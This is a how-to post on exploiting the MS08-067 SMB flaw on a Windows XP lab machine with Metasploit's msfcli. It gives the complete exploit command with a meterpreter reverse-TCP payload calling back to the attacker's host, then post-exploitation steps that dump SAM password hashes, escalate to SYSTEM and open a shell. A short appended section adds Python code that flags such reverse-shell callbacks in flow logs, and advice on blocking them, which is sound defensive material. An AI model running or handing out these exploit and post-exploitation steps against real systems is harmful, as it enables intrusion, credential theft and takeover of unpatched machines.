exploit using metasploit msfcli

How to exploit using msfcli ?

Metasploit exploit using msfcli command line interface.

Warning: don't try this on any public, corporate or unauthorized networks. Perform it only when you have authorization to do so.

Exploit attempts using the Metasploit Framework can be made through different approaches, such as msfcli, msfconsole, shell scripting and resource scripting.

Help for msfcli command line usage

#msfcli -h

In this guide we use Windows XP as our target (victim).

Lab – Setup

Target:
Target(victim) : 192.168.1.245
OS in target : Windows XP
Exploit : ms08-067
Port : 445

Attacker
Attacker : 192.168.0.252
OS in attacker : Kali Linux
Exploit framework : Metasploit
Exploit method : msfcli

msfcli usage :

Exploit module:
#msfcli exploitname payload=windows/meterpreter/reverse_tcp lhost=IP E

Scanner module:
#msfcli auxiliary/scanner/http/http_version rhosts=IP E

Note: the "E" option executes the module.

The location of modules in Kali Linux
/usr/share/metasploit-framework/modules/exploits/windows/

Let's make an exploit attempt on the target PC.

Step 1:

#msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.252 LPORT=4444 RHOST=192.168.1.245 E

Note:
LHOST = local host IP (attacker)
LPORT = 4444, the port on the attacker PC that receives the reverse shell
RHOST = 192.168.1.245, target IP address (victim)

E = Execute

Step 2:

Once the meterpreter session is established, proceed to post-exploitation.

The help command shows the usage of the commands available during post-exploitation, information gathering or privilege escalation.

meterpreter > help

Get the password hashes from the SAM database
meterpreter > hashdump

Privilege escalation to the SYSTEM account
meterpreter > getsystem

Get into the shell of the target PC
meterpreter > shell
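
Detection note (an added example, not part of the original post): with a reverse_tcp payload, the target connects back to LHOST:LPORT right after the inbound SMB connection on port 445, and that pairing is visible in flow logs. The sketch below correlates the two events; the flow-record format, the 30-second window and the allowlisted callback ports are assumptions, and the sample records are constructed.

```python
from datetime import datetime, timedelta

# Constructed flow records (not captured traffic): time src sport dst dport
SAMPLE_FLOWS = """\
2024-01-10T10:00:01 192.168.0.252 51514 192.168.1.245 445
2024-01-10T10:00:03 192.168.1.245 1045 192.168.0.252 4444
2024-01-10T10:05:00 192.168.1.30 49822 192.168.1.245 445
2024-01-10T10:05:02 192.168.1.245 1050 192.168.1.10 53
2024-01-10T11:00:00 192.168.1.40 50211 192.168.1.245 445
2024-01-10T11:20:00 192.168.1.245 1060 192.168.1.40 8080
"""

SMB_PORT = 445
WINDOW = timedelta(seconds=30)  # assumed correlation window
# Assumed allowlist: ports a Windows host may legitimately dial on an SMB peer
EXPECTED_CALLBACK_PORTS = {53, 88, 135, 139, 389, 445}

def parse_flows(text):
    """Parse whitespace-separated flow lines, skipping malformed ones."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, sport, dst, dport = parts
        try:
            flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
        except ValueError:
            continue
    return sorted(flows)  # chronological order

def find_smb_callbacks(flows):
    """Flag A -> B:445 followed within WINDOW by B -> A on an unexpected port."""
    last_smb = {}  # (client, server) -> time of most recent SMB connection
    alerts = []
    for ts, src, _sport, dst, dport in flows:
        if dport == SMB_PORT:
            last_smb[(src, dst)] = ts
            continue
        seen = last_smb.get((dst, src))  # did dst recently connect to src:445?
        if seen and ts - seen <= WINDOW and dport not in EXPECTED_CALLBACK_PORTS:
            alerts.append({"smb_client": dst, "smb_server": src,
                           "callback_port": dport,
                           "delay_s": (ts - seen).total_seconds()})
    return alerts

if __name__ == "__main__":
    for alert in find_smb_callbacks(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

Blocking outbound connections from workstations to arbitrary ports, and inbound 445 between client subnets, removes both halves of this pattern.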
